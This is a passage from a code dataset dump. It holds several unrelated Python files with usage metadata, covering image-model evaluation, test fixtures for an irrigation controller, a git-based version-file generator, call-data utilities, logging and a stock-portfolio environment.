"urllib.request.request.Request", "line_number": 86, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 86, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 86, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 87, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 87, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 87, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 99, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 99, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 100, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 100, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 103, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 104, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 107, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 111, "usage_type": "call"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 113, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 113, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}, {"api_name": "textwrap.wrap", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 127, "usage_type": "attribute"}]} +{"seq_id": "384902398", "text": "#-*-coding:utf-8-*-\r\n'''\r\nCreated on Nov 7,2018\r\n\r\n@author: pengzhiliang\r\n'''\r\nfrom __future__ import print_function\r\nimport numpy as np\r\n\r\nimport torch\r\nfrom PIL import Image\r\nfrom model import Net\r\nfrom dataset import xywh_to_x1y1x2y2, x1y1x2y2_to_xywh\r\nfrom torchvision import transforms\r\nfrom display import dis_gt\r\n\r\nresume_path = '/home/pzl/object-localization/checkpoint/best_model.pkl'\r\nprint('Loading model...')\r\nnet = Net('mobilenet',freeze_basenet = False)\r\nnet.load_state_dict(torch.load(resume_path)[\"model_state\"])\r\nnet.eval()\r\n\r\nprint('load image...')\r\nimg_path = './images/test_img.JPEG'\r\ntarget_classes = ['car', 'bird', 'turtle', 'dog', 'lizard']\r\nbbox = np.array([11,37,90,105],dtype = np.float32) \r\nlabel = np.array([3],dtype = np.int32) \r\n\r\nimg = Image.open(img_path).convert('RGB')\r\nIMG = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.485,0.456,0.406),(0.229,0.224,0.225))\r\n])(img)\r\n# gt_class,gt_bbox =torch.Tensor(label),torch.Tensor(bbox/128.)\r\n\r\nwith torch.no_grad():\r\n outputs_reg,outputs_class = net(IMG.unsqueeze(0))\r\n # print(outputs_reg,outputs_class)\r\n _,pred_label = outputs_class.squeeze(0).max(dim = 0)\r\n pred_bbox = xywh_to_x1y1x2y2(outputs_reg).squeeze(0)\r\n print(pred_label,pred_bbox)\r\n\r\ndis_gt(img,[target_classes[int(pred_label.item())],target_classes[label]],[pred_bbox.numpy()*128,bbox])\r\n", "sub_path": "eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 1379, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "model.Net", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 27, "usage_type": "attribute"}, 
{"api_name": "PIL.Image.open", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 29, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 30, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 30, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 36, "usage_type": "call"}, {"api_name": "dataset.xywh_to_x1y1x2y2", "line_number": 40, "usage_type": "call"}, {"api_name": "display.dis_gt", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "618119176", "text": "\"\"\"\nFile: fixtures.py\nAuthor: Aaron Bach\nEmail: bachya1208@gmail.com\nGithub: https://github.com/bachya/regenmaschine\n\"\"\"\n\n# -*- coding: utf-8 -*-\n# pylint: disable=redefined-outer-name\n\nimport pytest\n\n\n@pytest.fixture(scope='session')\ndef programs_nextrun_response_200():\n \"\"\" Fixture to return a successful local response \"\"\"\n return {'nextRuns': [{'pid': 1, 'startTime': '06:00'}]}\n\n\n@pytest.fixture(scope='session')\ndef programs_all_response_200(programs_get_response_200):\n \"\"\" Fixture to return a good set of /program data \"\"\"\n return {'programs': [programs_get_response_200]}\n\n\n@pytest.fixture(scope='session')\ndef programs_get_response_200():\n \"\"\" Fixture to return info on a single program \"\"\"\n return {\n 'uid':\n 1,\n 'name':\n 'Default Watering Schedule',\n 'active':\n True,\n 'startTime':\n '06:00',\n 'cycles':\n 0,\n 'soak':\n 0,\n 'cs_on':\n False,\n 'delay':\n 0,\n 'delay_on':\n False,\n 'status':\n 0,\n 'startTimeParams': {\n 'offsetSign': 0,\n 'type': 0,\n 'offsetMinutes': 0\n },\n 'frequency': {\n 'type': 0,\n 'param': '0'\n },\n 'coef':\n 0.0,\n 'ignoreInternetWeather':\n False,\n 'futureField1':\n 0,\n 'freq_modified':\n 0,\n 'useWaterSense':\n False,\n 'nextRun':\n '2017-06-26',\n 'startDate':\n '2017-05-29',\n 'endDate':\n None,\n 'yearlyRecurring':\n True,\n 'simulationExpired':\n False,\n 'wateringTimes': [{\n 'id': 1,\n 'order': 1,\n 'name': 'Backyard Landscaping',\n 'duration': 0,\n 'active': True,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 2,\n 'order': 2,\n 'name': 'Planter Box',\n 'duration': 0,\n 'active': True,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 3,\n 'order': 3,\n 'name': 'Zone 3',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 4,\n 'order': 4,\n 'name': 'Zone 4',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 5,\n 'order': 5,\n 'name': 'Zone 5',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 6,\n 'order': 6,\n 'name': 'Zone 6',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 7,\n 'order': 7,\n 'name': 'Zone 7',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }, {\n 'id': 8,\n 'order': 8,\n 'name': 'Zone 8',\n 'duration': 0,\n 'active': False,\n 'userPercentage': 1.0,\n 'minRuntimeCoef': 1\n }]\n }\n\n\n@pytest.fixture(scope='session')\ndef programs_running_response_200():\n \"\"\" Fixture to return running programs \"\"\"\n return {\n 
'programs': [{\n 'uid': 1,\n 'name': 'Default Watering Schedule',\n 'manual': True,\n 'userStartTime': '2017-06-26 16:12:00',\n 'realStartTime': '2017-06-26 16:12:55',\n 'status': 1\n }]\n }\n", "sub_path": "tests/fixtures/program.py", "file_name": "program.py", "file_ext": "py", "file_size_in_byte": 3790, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.fixture", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 147, "usage_type": "call"}]} +{"seq_id": "79837176", "text": "\"\"\"\nThis class is responsible for creating the Version.h file in the source directory\nand returning the version parameters used by the documentation generator\n\"\"\"\nimport os\nimport sys\nimport subprocess\nimport os.path\nimport shutil\nimport fileinput\nimport re\nimport time\nimport pytz\nfrom datetime import datetime, date\n\nimport Globals\n\nEX_OK = getattr(os, \"EX_OK\", 0)\n\nclass Version:\n\tdef __init__(self):\n\t\tprint(\"--> Starting Version Class\")\n\n\tdef create_version_header(self):\n\t\tprint(\"--> Creating Version.h from Git Information\")\n\n\t\tif Globals.git_path_ == '':\n\t\t\tprint(\"[WARNING] - No Git was found. Cannot create Version.h file\")\n\t\t\treturn True\n\n\t\tp = subprocess.Popen(['git', '--no-pager', 'log', '-n', '1', '--pretty=format:%H%n%h%n%ci'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\tout, err = p.communicate()\n\t\tlines = out.decode('utf-8').split('\\n')\n\t\tif len(lines) != 3:\n\t\t\treturn Globals.PrintError('Format printed by GIT did not meet expectations. Expected 3 lines but got ' + str(len(lines)))\n\n\t\ttime_pieces = lines[2].split(' ')\n\t\ttemp = ' '.join(time_pieces)\n\t\tlocal_time = datetime.strptime(temp, '%Y-%m-%d %H:%M:%S %z')\n\t\tutc_time = local_time.astimezone(pytz.utc)\n\t\t\n\t\t# Build the Version.h file\n\t\tprint('-- Build SPM/Source/Version.h with Git log information')\n\t\tversion = '// This file is automatically built by the build system. Do not modify this file\\n'\n\t\tversion += '#ifndef VERSION_H_\\n'\n\t\tversion += '#define VERSION_H_\\n'\n\t\tversion += '#define VERSION \"' + Globals.SPM_version_number + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_DATE \"' + utc_time.strftime('%Y-%m-%d') + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_YEAR \"' + utc_time.strftime('%Y') + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_MONTH \"' + utc_time.strftime('%B') + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_TIME \"' + utc_time.strftime('%H:%M:%S') + '\"\\n'\n\t\tversion += '#define SOURCE_CONTROL_VERSION \"' + utc_time.strftime('%Y-%m-%d %H:%M:%S %Z') + '\"\\n'\n\t\tversion += '#endif\\n'\n\t\tfile_output = open(Globals.root_directory_ + '/Source/Version.h', 'w')\n\t\tfile_output.write(version)\n\t\tfile_output.close()\n\t\t\n\t\t# Build the Version.tex file\n\t\tprint('-- Build SPM/Documention/Manual/version.tex with Git log information')\n\t\tversion = '% WARNING: THIS FILE IS AUTOMATICALLY GENERATED BY doBuild documentation. 
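The fixtures above compose: programs_all_response_200 receives programs_get_response_200 simply by naming it as a parameter, and scope='session' means each is built once per test session. A minimal standalone illustration with generic names:

import pytest

@pytest.fixture(scope='session')
def single_item():
    return {'uid': 1}

@pytest.fixture(scope='session')
def item_list(single_item):  # pytest injects the fixture above by name
    return {'items': [single_item]}

def test_item_list(item_list):
    assert item_list['items'][0]['uid'] == 1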
DO NOT EDIT THIS FILE\\n'\n\t\tversion += '\\\\newcommand{\\\\VERSION}{' + Globals.SPM_version_number + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlDateDoc}{' + utc_time.strftime('%Y-%m-%d') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlYearDoc}{' + utc_time.strftime('%Y') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlMonthDoc}{' + utc_time.strftime('%B') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlTimeDoc}{' + utc_time.strftime('%H:%M:%S') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlShortVersionDoc}{' + utc_time.strftime('%Y-%m-%d') + '}\\n'\n\t\tversion += '\\\\newcommand{\\\\SourceControlVersionDoc}{' + utc_time.strftime('%Y-%m-%d %H:%M:%S %Z') + '}\\n'\n\t\tfile_output = open(Globals.root_directory_ + '/Documentation/Manual/Version.tex', 'w')\n\t\tfile_output.write(version)\n\t\tfile_output.close()\n # Build SPNversion.tex for use with syntax files\n\t\tSPMversion = Globals.SPM_version_number + '-' + utc_time.strftime('%Y-%m-%d')\n\t\tfile_output = open(Globals.root_directory_ + '/Documentation/Manual/SPMversion.tex', 'w')\n\t\tfile_output.write(SPMversion)\n\t\tfile_output.close()\n\t\t\t\t\n\t\t# Build the Version.R file\n\t\tprint('-- Build SPM/RLibrary/version.R with Git log information')\n\t\tversion = '# WARNING: THIS FILE IS AUTOMATICALLY GENERATED BY doBuild documentation. DO NOT EDIT THIS FILE\\n'\n\t\tversion += 'version.number<-\"' + Globals.SPM_version_number + '\"\\n'\n\t\tversion += 'version.date<-\"' + utc_time.strftime('%Y-%m-%d') + '\"\\n'\n\t\tfile_output = open(Globals.root_directory_ + '/R-libraries/Version.R', 'w')\n\t\tfile_output.write(version)\n\t\tfile_output.close()\n\n\t\t# Build the Version.nsi file\n\t\tprint('-- Build SPM/installer/version.nsi with Git log information')\n\t\tversion = '# WARNING: THIS FILE IS AUTOMATICALLY GENERATED BY doBuild documentation. 
DO NOT EDIT THIS FILE\\n'\n\t\tversion += '!define PRODUCT_VERSION \"' + Globals.SPM_version_number + \"-\" + utc_time.strftime('%Y-%m-%d') + '\"\\n'\n\t\tfile_output = open(Globals.root_directory_ + '/installer/Version.nsi', 'w')\n\t\tfile_output.write(version)\n\t\tfile_output.close()\n\n\t\tprint('-- Version updated')\n\t\t\n\t\treturn True\n\t\t\n\t\n", "sub_path": "BuildSystem/buildtools/classes/Version.py", "file_name": "Version.py", "file_ext": "py", "file_size_in_byte": 4396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "Globals.git_path_", "line_number": 27, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 31, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "Globals.PrintError", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "name"}, {"api_name": "pytz.utc", "line_number": 40, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 47, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 54, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 61, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 68, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 72, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 73, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 80, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 82, "usage_type": "attribute"}, {"api_name": "Globals.SPM_version_number", "line_number": 89, "usage_type": "attribute"}, {"api_name": "Globals.root_directory_", "line_number": 90, "usage_type": "attribute"}]} +{"seq_id": "350683506", "text": "import datetime\nimport tabulate\nimport logging\nimport sys\nimport webbrowser\n\nfrom . 
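The timestamp handling in Version.py above hinges on parsing git's %ci output with a %z offset and normalising it to UTC via pytz before any strftime formatting. That conversion in isolation, using a made-up timestamp:

from datetime import datetime
import pytz

raw = '2021-03-04 10:11:12 +1300'  # made-up %ci-style value
local_time = datetime.strptime(raw, '%Y-%m-%d %H:%M:%S %z')
utc_time = local_time.astimezone(pytz.utc)
print(utc_time.strftime('%Y-%m-%d %H:%M:%S %Z'))  # 2021-03-03 21:11:12 UTC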
import matrix as matrixFile\n\n\nclass _AnsiColorizer(object):\n _colors = dict(black=30, red=31, green=32, yellow=33,\n blue=34, magenta=35, cyan=36, white=37)\n\n def __init__(self, stream):\n self.stream = stream\n\n @classmethod\n def supported(cls, stream=sys.stdout):\n if not stream.isatty():\n return False # auto color only on TTYs\n try:\n import curses\n except ImportError:\n return False\n else:\n try:\n try:\n return curses.tigetnum(\"colors\") > 2\n except curses.error:\n curses.setupterm()\n return curses.tigetnum(\"colors\") > 2\n except:\n raise\n # guess false in case of error\n return False\n\n def write(self, text, color):\n \"\"\"\n Write the given text to the stream in the given color.\n \"\"\"\n color = self._colors[color]\n self.stream.write('\\x1b[{}m{}\\x1b[0m'.format(color, text))\n\n\nclass ColorHandler(logging.StreamHandler):\n def __init__(self, stream=sys.stderr):\n super(ColorHandler, self).__init__(_AnsiColorizer(stream))\n\n def emit(self, record):\n msg_colors = {\n logging.DEBUG: (\"Debug\", \"green\"),\n logging.INFO: (\"Info\", \"blue\"),\n logging.WARNING: (\"Warning\", \"yellow\"),\n logging.ERROR: (\"Error\", \"red\")\n }\n\n header, color = msg_colors.get(record.levelno, \"blue\")\n if 'prefix' in record.__dict__:\n header = record.prefix\n else:\n header = header + ':'\n self.stream.write(\"{} {}\\n\".format(header, record.msg), color)\n\n\ndef get_weighted_edge_list(edge_list, directed):\n weighted_edge_list = []\n\n if not directed:\n # only the connections are cared.\n # return a list of lists of [user1,use2,number_of_connections]\n for edge in edge_list:\n count = edge_list.count(edge)\n reversed_edge = edge.copy()\n reversed_edge.reverse()\n r_count = edge_list.count(reversed_edge)\n weight = count + r_count\n weighted_edge = edge.copy()\n weighted_edge.append(weight)\n\n not_added = True\n for i in weighted_edge_list:\n if (edge == [i[0], i[1]]) or (reversed_edge == [i[0], i[1]]):\n not_added = False\n break\n if not_added:\n weighted_edge_list.append(weighted_edge)\n\n return weighted_edge_list\n if directed:\n # return a list of lists of [user1,use2,number_of_connections]\n for edge in edge_list:\n weight = edge_list.count(edge)\n weighted_edge = edge.copy()\n weighted_edge.append(weight)\n\n not_added = True\n for i in weighted_edge_list:\n if edge == [i[0], i[1]]:\n not_added = False\n break\n if not_added:\n weighted_edge_list.append(weighted_edge)\n\n return weighted_edge_list\n\n\ndef print_matrix(matrix, headers):\n print('matrix : ', matrix)\n print('header : ', headers)\n if len(matrix) > 10:\n print(\"Matrix Length : \", len(matrix))\n html = \"\"\"\n \n \n
<title>\n Connection Matrix\n </title>\n </head>\n <body>
\n {table}\n \n \n \"\"\"\n table = tabulate.tabulate(matrix, headers=headers, tablefmt='html', stralign='center')\n print('table : ', table)\n b = table.encode('utf-8')\n f = open('connection_matrix.html', 'wb')\n f.write(b)\n f.close()\n webbrowser.open_new_tab('connection_matrix.html')\n else:\n print(\">> connection matrix\")\n print(tabulate.tabulate(matrix, headers=headers, tablefmt='pretty'))\n\n\ndef print_matrix_new(matrix, headers):\n if len(matrix) > 0:\n print(\"Matrix Length : \", len(matrix))\n html_tag = matrixFile.matrix_html_head\n table_header = create_header(headers)\n table_body = create_rows(matrix)\n html_tag += ' \\n {} \\n {} \\n
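get_weighted_edge_list above counts duplicates with list.count inside a loop over every edge, which is quadratic in the number of edges. collections.Counter produces the same weights in one pass; a sketch of the undirected case with an invented edge list (tuples stand in for the two-element lists):

from collections import Counter

edges = [('a', 'b'), ('b', 'a'), ('a', 'b'), ('b', 'c')]  # invented sample
counts = Counter(tuple(sorted(e)) for e in edges)  # merge the two directions
weighted = [[u, v, w] for (u, v), w in counts.items()]
print(weighted)  # [['a', 'b', 3], ['b', 'c', 1]]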
\\n \\n'.format(table_header, table_body)\n f = open('outputs\\\\connection_matrix.html', 'w')\n f.write(html_tag)\n f.close()\n webbrowser.open_new_tab('outputs\\\\connection_matrix.html')\n\n\ndef create_rows(matrix, text_align='center'):\n row_tag_list = ''\n for each_row in matrix:\n if each_row[0] != '':\n each_row_tag = ''\n for each_row_item in each_row:\n if each_row_item == each_row[0]:\n each_row_items = ' {} '.format(text_align, each_row_item)\n else:\n each_row_items = ' {} '.format(text_align, each_row_item)\n each_row_tag += each_row_items\n each_row_tag_end = each_row_tag + ' \\n'\n row_tag_list += each_row_tag_end\n row_tag_list_end = row_tag_list + ''\n return row_tag_list_end\n\n\ndef create_header(headers, text_align='center'):\n new_tag = ' \\n '\n for each_header in headers:\n tag = ' {} '.format(text_align, each_header)\n new_tag += tag\n tag_end = new_tag + ' \\n '\n return tag_end\n\n\ndef get_datetime_from_timestamp(timestamp):\n timestamp.strip()\n day, month, date, time, zone, year = timestamp.split()\n date, month, year = map(int, [date, month_string_to_number(month), year])\n hour, minute, sec = map(int, time.strip().split(\":\"))\n dt = datetime.datetime(year, month, date, hour, minute, sec)\n return dt\n\n\ndef month_string_to_number(string):\n m = {\n 'jan': 1,\n 'feb': 2,\n 'mar': 3,\n 'apr': 4,\n 'may': 5,\n 'jun': 6,\n 'jul': 7,\n 'aug': 8,\n 'sep': 9,\n 'oct': 10,\n 'nov': 11,\n 'dec': 12\n }\n s = string.strip()[:3].lower()\n\n try:\n out = m[s]\n return out\n except ValueError:\n raise ValueError('Not a month')\n\n\ndef get_index_of_day(string):\n d = {\n 'Mon': 1,\n 'Tue': 2,\n 'Wed': 3,\n 'Thu': 4,\n 'Fri': 5,\n 'Sat': 6,\n 'Sun': 7\n }\n day = string.split()[0]\n try:\n out = d[day]\n return out\n except ValueError:\n raise ValueError('Not a day')\n", "sub_path": "cellyzer/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 6624, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.stdout", "line_number": 18, "usage_type": "attribute"}, {"api_name": "curses.tigetnum", "line_number": 28, "usage_type": "call"}, {"api_name": "curses.error", "line_number": 29, "usage_type": "attribute"}, {"api_name": "curses.setupterm", "line_number": 30, "usage_type": "call"}, {"api_name": "curses.tigetnum", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 46, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 51, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 52, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 53, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tabulate.tabulate", "line_number": 121, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 127, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 130, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "302326182", "text": "#!/usr/bin/env python3\n#author:Alnk(李成果)\nimport logging\nfrom logging import DEBUG\n\n\ndef get_logger(log_file, log_msg):\n # 1.创建logger函数对象\n logger = logging.getLogger() # 这个参数是用户名字\n # 2.创建流对象:文件流fh,屏幕流ch\n fh = 
logging.FileHandler(log_file) # write to the log file\n # 3. Create the log format: multiple formats can be created here\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n # 4. Attach the format object to the stream object\n fh.setFormatter(formatter) # attach the log format to the file stream\n # 5. Attach the stream object to the logger\n logger.addHandler(fh)\n # 6. Set the logging level\n logger.setLevel(DEBUG) # global setting, applies to both the file stream and the screen stream\n #\n logger.info(log_msg) # log an INFO message\n # remove the handler after logging, otherwise messages are logged repeatedly\n logger.removeHandler(fh)\n\n", "sub_path": "08 day08/03 作业 day08/atm/core/log.py", "file_name": "log.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 19, "usage_type": "argument"}]} +{"seq_id": "415146996", "text": "# -*- coding: utf-8 -*-\n\n# Created by junfeng on 3/28/16.\n\n# logging config\nimport logging\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\nimport skipthoughts\nmodel = skipthoughts.load_model()\n\nX = [\n 'Hello, skip thoughts',\n]\nvectors = skipthoughts.encode(model, X)\nprint(vectors)", "sub_path": "test_skipthoughts.py", "file_name": "test_skipthoughts.py", "file_ext": "py", "file_size_in_byte": 436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "skipthoughts.load_model", "line_number": 14, "usage_type": "call"}, {"api_name": "skipthoughts.encode", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "607141220", "text": "\"\"\"\nDefines the environment for portfolio management\n\"\"\"\n\nfrom collections import OrderedDict\nfrom pprint import pprint\n\nimport gym\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom gym import spaces\nfrom pytorch_pretrained_bert import BertTokenizer\nfrom torchlib.common import eps\n\ndate_format = '%Y-%m-%d'\n\n\ndef sharpe(returns, freq=30, rfr=0):\n \"\"\" Given a set of returns, calculates naive (rfr=0) sharpe (eq 28). \"\"\"\n return (np.sqrt(freq) * np.mean(returns - rfr + eps)) / np.std(returns - rfr + eps)\n\n\ndef max_drawdown(returns):\n \"\"\" Max drawdown. 
See https://www.investopedia.com/terms/m/maximum-drawdown-mdd.asp \"\"\"\n peak = returns.max()\n trough = returns[returns.idxmax():].min()\n return (trough - peak) / (peak + eps)\n\n\nclass StockObservation(object):\n \"\"\"\n A stock observation consists of previous day numeric, current day numeric and current day news\n \"\"\"\n\n def __init__(self, numeric, news, prev_numeric, current_date):\n self.prev_numeric = prev_numeric\n self.numeric = numeric\n self.news = news\n self.current_date = current_date\n\n def get_close_ratio(self):\n return self.numeric[:, -1] / self.prev_numeric[:, -1]\n\n def get_news(self):\n return self.news\n\n def get_current_date(self):\n return self.current_date\n\n\nclass DataGenerator(object):\n def __init__(self, pd_frame: OrderedDict, total_steps=260, start_date=None):\n \"\"\"\n\n Args:\n pd_frame: a dictionary of panda frame that provide stock price info and news or tweets.\n The key is the stock name.\n total_steps: total number of steps to simulate\n start_date: date to start simulation. Used to compare algorithms.\n \"\"\"\n self.pd_frame = pd_frame\n self.start_date = pd.Timestamp(start_date) if start_date else None\n any_stock_frame = pd_frame.get(list(pd_frame.keys())[0])\n self.date_index = any_stock_frame.index\n if total_steps > 0:\n self.total_steps = total_steps\n else:\n self.total_steps = self.date_index.size - 2\n self.earliest_record_date = pd.Timestamp(any_stock_frame.index.values[0])\n self.last_record_date = pd.Timestamp(any_stock_frame.index.values[-1])\n self.news_title = ['Top{}'.format(i + 1) for i in range(25)]\n\n if self.start_date and self.start_date not in self.date_index:\n raise ValueError('Start date not in date index. Must from {} to {} and must be weekdays'.format(\n self.earliest_record_date.strftime(date_format), self.last_record_date.strftime(date_format)))\n\n def _get_data_by_date(self, date):\n prices = []\n news = []\n for stock in self.pd_frame:\n current_frame = self.pd_frame[stock]\n line = current_frame.loc[date]\n open = line['Open']\n high = line['High']\n low = line['Low']\n close = line['Close']\n current_price = np.array([open, high, low, close])\n current_news = []\n for title in self.news_title:\n current_news.append(line[title])\n\n prices.append(current_price)\n news.append(current_news)\n\n prices = np.array(prices)\n return prices, news\n\n def _get_next_date(self):\n next_date = self.current_date + pd.Timedelta(days=1)\n while next_date not in self.date_index:\n if next_date > self.last_record_date:\n raise ValueError('Current date {} exceeds max date {}'.format(self.current_date,\n self.last_record_date))\n next_date += pd.Timedelta(days=1)\n return next_date\n\n def step(self):\n \"\"\"\n\n Returns: a data dictionary map from stock name to (open, high, low, close, Top1, ..., Top25)\n\n \"\"\"\n self.steps += 1\n self.current_date = self._get_next_date()\n if self.current_date == self.last_record_date or self.steps == self.total_steps:\n done = True\n else:\n done = False\n\n current_prices, current_news = self._get_data_by_date(self.current_date)\n obs = StockObservation(current_prices, current_news, self.prev_prices, self.current_date)\n self.prev_prices = current_prices.copy()\n return obs, done\n\n def reset(self):\n self.steps = 0\n if self.start_date:\n self.current_date = self.start_date\n else:\n idx = np.random.randint(low=0, high=self.date_index.size - self.total_steps - 1)\n self.current_date = self.date_index[idx] # random select\n\n prev_prices, _ = 
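sharpe and max_drawdown above both expect a pandas Series of per-step values (max_drawdown slices from idxmax, so a bare list will not work). A quick usage sketch with invented returns, inlining the same arithmetic:

import numpy as np
import pandas as pd

eps = 1e-8
returns = pd.Series([1.00, 1.02, 0.99, 1.03, 0.97])  # invented rate_of_return + 1

sharpe_ratio = (np.sqrt(30) * np.mean(returns + eps)) / np.std(returns + eps)  # rfr=0
peak = returns.max()
trough = returns[returns.idxmax():].min()  # worst value after the peak
print(sharpe_ratio, (trough - peak) / (peak + eps))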
